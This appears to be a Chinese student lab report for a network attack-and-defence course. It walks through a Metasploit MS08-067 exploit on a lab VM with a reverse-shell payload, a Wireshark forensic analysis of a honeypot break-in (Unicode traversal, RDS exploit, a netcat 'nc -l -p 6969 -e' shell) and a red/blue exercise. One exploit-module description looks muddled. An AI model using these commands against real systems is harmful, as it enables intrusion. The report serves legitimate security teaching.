20253915 2025-2026-2 《网络攻防实践》实践六报告

1 实践内容

1.1 Metasploit Windows 远程渗透攻击

1.Metasploit Windows 远程渗透攻击是指利用 Metasploit Framework (MSF) 这一开源漏洞利用框架,针对 Windows 操作系统及相关服务发起的远程代码执行、权限获取与持久化控制的攻击过程,核心目标是在未授权情况下获取目标系统的控制权。
2.核心原理与架构

  • 模块化设计:MSF 采用插件化架构,核心组件包括:
    • Exploit 模块:针对特定漏洞的攻击代码(如 MS17-010 永恒之蓝漏洞利用模块)
    • Payload 模块:漏洞触发后在目标系统执行的恶意代码(如 Meterpreter 反向 Shell)
    • Auxiliary 模块:辅助功能(扫描、嗅探、口令猜测等)
    • Post 模块:提权、凭证窃取、数据收集等后渗透工具
  • 攻击流程:
    • 目标探测(端口扫描、服务识别)
    • 漏洞发现(匹配已知漏洞模块)
    • 利用漏洞获取初始访问权限
    • 后渗透(提权、权限维持、数据窃取)
  1. 典型攻击场景与技术
攻击类型 技术特点 代表漏洞
SMB 服务攻击 利用 Windows 文件共享协议漏洞 MS08-067、MS17-010 (永恒之蓝)
远程代码执行 通过服务漏洞直接执行系统命令 CVE-2021-40444(MSHTML)
口令暴力破解 针对 RDP、SMB 等服务进行字典攻击 -
钓鱼攻击 诱骗用户执行恶意载荷 (msfvenom 生成) 恶意 Office 文档、可执行文件
  1. 核心工具组件
  • msfconsole:MSF 命令行控制台,核心操作界面
  • msfvenom:Payload 生成工具,可定制恶意代码并规避杀软检测
  • Meterpreter:高级后渗透工具,提供文件操作、进程控制、内存凭证窃取等功能
  • Post 模块:如windows/gather/credentials系列,用于提取系统敏感信息
  1. 应用场景
  • 渗透测试:评估 Windows 系统安全防护能力
  • 红队演练:模拟真实攻击,检验企业纵深防御体系
  • 安全研究:验证漏洞危害,开发防御方案

1.2 NT 系统破解攻击取证分析

  1. 核心定义
    NT 系统破解攻击取证分析是对 Windows NT 内核系统(NT/2000/XP/Server 2003 及后续版本)遭受密码破解、哈希窃取、权限提升等攻击行为的事后调查取证过程,核心目标是还原攻击路径、确认攻击手法、固定证据并追溯攻击者身份。
  2. 攻击与取证核心逻辑
    攻击侧:NT 系统安全的核心是SAM 数据库(存储用户哈希凭证)和LSASS 进程(内存中缓存登录凭证)
    常见攻击手段:
  • 哈希窃取(通过 mimikatz 等工具读取 LSASS 内存)
  • 哈希破解(使用 hashcat/John the Ripper 破解 NTLM 哈希)
  • Pass-the-Hash(哈希传递,无需明文密码直接登录)
  • SAM 数据库导出(离线破解)
    取证侧:遵循 “不破坏原始证据” 原则,通过系统日志、内存镜像、网络流量等多维度数据重建攻击过程。
  1. 取证分析关键步骤与技术
    (1)证据获取
  • 内存镜像:使用 FTK Imager、Volatility 等工具获取物理内存数据
  • 磁盘镜像:对系统盘进行只读镜像,避免数据篡改
  • 网络流量:分析 Wireshark 捕获的攻击数据包
  • 日志收集:Windows 事件日志(安全日志、系统日志)、应用程序日志
    (2)证据分析
  • 哈希凭证分析:从内存 / 磁盘镜像中提取 SAM 数据库或 LSASS 进程中的 NTLM 哈希
  • 攻击痕迹识别:查找异常进程(如 mimikatz)、可疑网络连接、注册表篡改记录
  • 时间线重建:通过日志时间戳和文件修改时间还原攻击顺序
  • 权限变更分析:检查用户权限提升记录、组策略修改等
    (3)工具集
  • 内存分析:Volatility 3、Winpmem
  • 哈希破解:Hashcat(支持 GPU 加速)、John the Ripper
  • 日志分析:Event Log Explorer、LogParser
  • 流量分析:Wireshark、Tcpdump
  1. 典型取证场景
  • 系统入侵事件调查:定位攻击者如何获取系统权限、窃取了哪些数据
  • 内部威胁分析:识别是否存在恶意内部人员利用破解手段获取未授权访问

1.3 Windows 渗透攻防团队对抗

  1. 核心定义
    Windows 渗透攻防团队对抗(又称红蓝对抗 / Red Team vs. Blue Team)是一种模拟真实网络攻击与防御的实战演练,通过红队(攻击方)与蓝队(防御方)的对抗性博弈,全面检验 Windows 系统及网络的安全防护能力、应急响应效率和人员协作水平。
  2. 对抗模式与核心角色
角色 定位 核心目标 关键能力要求
红队 模拟高级攻击者 (APT) 突破防御、获取核心数据、留下 "旗帜" 漏洞利用、社会工程、权限维持、隐蔽通信
蓝队 企业安全防御方 检测攻击、拦截入侵、溯源取证、恢复系统 威胁检测、日志分析、应急响应、漏洞修补
紫队 攻防协同方 整合攻防数据、优化防御策略 跨团队协作、数据分析、安全体系设计
  1. 对抗实施流程
    (1)准备阶段
  • 明确演练范围、目标和规则(如禁止破坏生产数据)
  • 搭建模拟环境(真实 Windows 域环境、业务系统)
  • 红队制定攻击计划,蓝队部署防御体系
    (2)对抗阶段
  • 红队行动:信息收集→漏洞探测→初始访问→权限提升→横向移动→数据窃取→痕迹清除
  • 蓝队行动:实时监控→攻击检测→应急响应→攻击阻断→溯源分析
  • 关键点:双方实时博弈,红队不断调整攻击手段,蓝队持续优化防御策略
    (3)总结阶段
  • 攻击路径复盘
  • 防御效果评估
  • 制定安全加固方案
  • 提升团队协作效率
  1. 常见对抗形式
  • AWD 模式(Attack With Defense):多用于 CTF 比赛,各队维护自己的 Windows 服务器,同时攻击其他队伍系统
  • 护网行动:国家主导的网络安全实战演练,针对关键信息基础设施进行攻防对抗
  • 内部红蓝演练:企业定期开展的安全能力评估,提升整体防御水平
  1. 核心技术与工具
  • 红队工具:Metasploit、Cobalt Strike、Empire、Mimikatz、BloodHound(域环境分析)
  • 蓝队工具:SIEM 系统(如 Splunk)、EDR(终端检测响应)、Wireshark、Velociraptor(端点监控)
  • 协同工具:ATT&CK 框架(攻击战术知识库)、MITRE D3FEND(防御框架)
  1. 价值与意义
    突破 “纸面合规” 局限,发现静态测试无法暴露的深层安全问题
    提升团队实战能力,培养 “懂攻击、会防御” 的复合型安全人才

2 实践过程

2.1 动手实践Metasploit windows attacker

任务:使用metasploit软件进行windows远程渗透统计实验
具体任务内容:使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权
(1)攻击机kali的IP地址
image

(2)靶机Win2kServer的IP地址
修改网络适配器为VMnet8,然后修改IP地址
image
image

虚拟机 IP地址
攻击机kali 192.168.200.3
靶机Win2kServer 192.168.200.6

(3)首先测试靶机与攻击机的连通性:

  • 攻击机ping靶机
    image
  • 靶机ping攻击机
    image

(4)然后再在kali中输入命令msfconsole进入Metasploit
image

(5)输入命令search ms08-067查看漏洞
image

(6)show options查看需要设置的参数
image

(7)show payloads显示可用的攻击负载,查看有效的攻击载荷
image

(8)输入use exploit/windows/smb/ms08_067_netapi使用相关攻击脚本,set payload generic/shell_reverse_tcp选择要用的攻击负载模块
image

(9)输入命令set RHOST 192.168.200.6 设置要攻击的IP,输入命令set LHOET 192.168.200.3 设置本机
image

(10)再利用命令show options查看是否配置成功
image

(11)输入命令exploit进行攻击,若出现会话连接则表示攻击成功。
image

(12)进一步验证攻击成功,利用命令ipconifg进行查看IP地址,通过下图可以看出,已经显示出靶机的IP地址
image

2.2 取证分析实践:解码一次成功的NT系统破解攻击。

来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。

2.2.1 攻击者使用了什么破解工具进行攻击

(1)使用wireshark打开snort-0204@0117.log
打开终端,进入文件所在目录,执行:wireshark snort-0204@0117.log
image

(2)利用命令ip.addr == 213.116.251.162 && ip.addr == 172.16.1.106进行过滤,通过下图可以看出,存在TCP连接和HTTP数据流。
image

(3)在117HTTP数据包中可以看到有特殊字符%C0%AF,该字符在Unicode编码中对应符号/,进而可以分析得到为Unicode攻击。攻击者利用Unicode攻击访问boot.ini文件
image

(5)在140数据包中可以发现攻击者想要获得msadcs.dll文件
image

(6)在追踪到149数据包时,发现攻击者输入数据查询语句进行SQL注入攻击
根据“ADM!ROX!YOUR!WORLD”特征字符串以及dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb的使用,可以推测出该攻击是由 msadc2.pl渗透攻击代码发起的
image

2.2.2 攻击者如何使用这个破解工具进入并控制了系统

(1)通过后续数据包可以看到攻击者曾尝试连接FTP服务,但是账号密码错误,被拒绝连接了
查看Follow->TCP Stream
image

(2)通过继续检查后面的数据包,发现攻击者成功建立了FTP连接
image

(3)后面发现攻击者通过 nc构建其一个远程 shell 通道。然后利用命令cmd1.exe /c nc -l -p 6969 -e cmd1.exe,使得攻击者连接 6969 端口,获得了访问权,并进入了交互式控制阶段。
image

2.2.3 攻击者获得系统访问权限后做了什么

已知攻击者连接的是6969端口,因此利用命令tcp.port == 6969进行过滤
image

攻击者在连接后进行了一系列操作,例如

  • 看文件:dir
    image
  • 删文件:del 文件名
    image
  • 看文本:type 文件名
    image
  • 看用户:net users
    image
  • 向文件写入:echo
    image
  • 试图建立net session连接,但是并没有成功
    image
  • 试图建立创建rdisk,但是失败了
    image
  • 攻击者还试图通过拷贝删除har.txt的方式来提升自己的权限
    image

2.2.4 我们如何防止这样的攻击

在这次攻击中被利用的漏洞为RDS和Unicode漏洞,而目前这两个漏洞已经有了对应的补丁

  • 安装漏洞补丁:安装 Windows NT 4.0 MSADC/RDS 漏洞官方安全补丁,从根源修复漏洞。
  • 删除危险虚拟目录:删除 IIS 中的MSADC、MSADCS虚拟目录,关闭不必要的 IIS 组件。
  • 禁用不必要服务:关闭RDS 远程数据服务、IIS 默认无用组件,遵循最小服务原则。
  • 防火墙防护:配置防火墙禁止外部访问 IIS 危险目录,仅开放 80/443 等必要端口。
  • 权限最小化:修改 IIS 匿名用户(IUSR_、IWAM_)权限,禁止加入管理员组。
  • 日志审计:开启 IIS 日志、系统安全日志,监控 MSADC 目录访问与异常命令执行。

2.2.5 你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么

是,如图所示,攻击者自己承认:I know that this is a lab server(我知道这是实验 / 蜜罐服务器)
image

2.3 团队对抗实践:windows系统远程渗透攻击和分析。

攻击机与靶机的IP地址如下
配置靶机和攻击机网络环境
Win2kServer ip为192.168.200.6
kali ip为192.168.200.3,

2.3.1 攻方使用metasploit选择漏洞进行攻击,获得控制权。(要求写出攻击方的同学信息、使用漏洞、相关IP地址等)

漏洞模块名称:exploit/windows/smb/mssql_netapi
漏洞性质:Microsoft SQL Server 的 存储过程远程代码执行漏洞(常见于 MS09-004 / CVE-2009-0228 等)。该模块通过 SMB 管道向目标 SQL Server 发送特制请求,利用 netapi 相关的不安全存储过程触发缓冲区溢出或命令注入,从而执行任意代码。

攻击方 IP 地址 192.168.200.3(LHOST)
攻击方监听端口 4444(LPORT)
目标 IP 地址 192.168.200.6(RHOSTS)

步骤与第一个小实验相同,重新设置一下攻击IP地址和本机IP地址
(1)在kali中检测能否ping通
image

(2)kali攻击Win2kServer:同第一部分
image

(3)创建文件夹fff:md fff
image

2.3.2防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。

(1)打开我的靶机虚拟机,等待同学的攻击,并打开wireshark进行抓包
通过追踪TCP数据流可以看到淘气的攻击者在我C盘下创建了一个文件夹
image

(2)查看创建的文件夹
image

3.学习中遇到的问题及解决

  • 问题1:攻击机与靶机ping不通,无法发起渗透
  • 问题1解决方案:统一网卡模式,修正 IP 与子网掩码配置,重新验证连通性。
  • 问题2:Metasploit 命令输入错误
  • 问题2解决方案:核对 Metasploit 标准命令拼写,严格按照规范输入指令。

4.实践总结

  • 掌握渗透测试核心流程:熟练完成 Metasploit 框架启动、漏洞模块查找、参数配置、攻击执行的全流程操作,理解 MS08-067 经典 Windows SMB 漏洞的利用原理。
  • 提升网络取证分析能力:学会使用 Wireshark 进行流量过滤、TCP 流追踪、攻击特征识别,能够从流量日志中溯源攻击工具、还原攻击步骤、定位攻击行为。
  • 建立系统安全防御思维:明确 Windows 系统针对 Unicode、RDS 等高危漏洞的防御手段,树立及时打补丁、最小权限、最小服务的网络安全防护理念。
  • 理解攻防对抗逻辑:通过团队攻防实践,清晰掌握攻击方漏洞利用、权限获取的操作思路,以及防守方流量监控、攻击取证的核心方法,提升实战化攻防能力。
  • 强化实操规范意识:认识到网络安全实验需在合法授权、私有环境下进行,严格遵守网络安全法律法规,杜绝非法渗透行为。
posted @ 2026-04-20 14:52  -;  阅读(42)  评论(0)    收藏  举报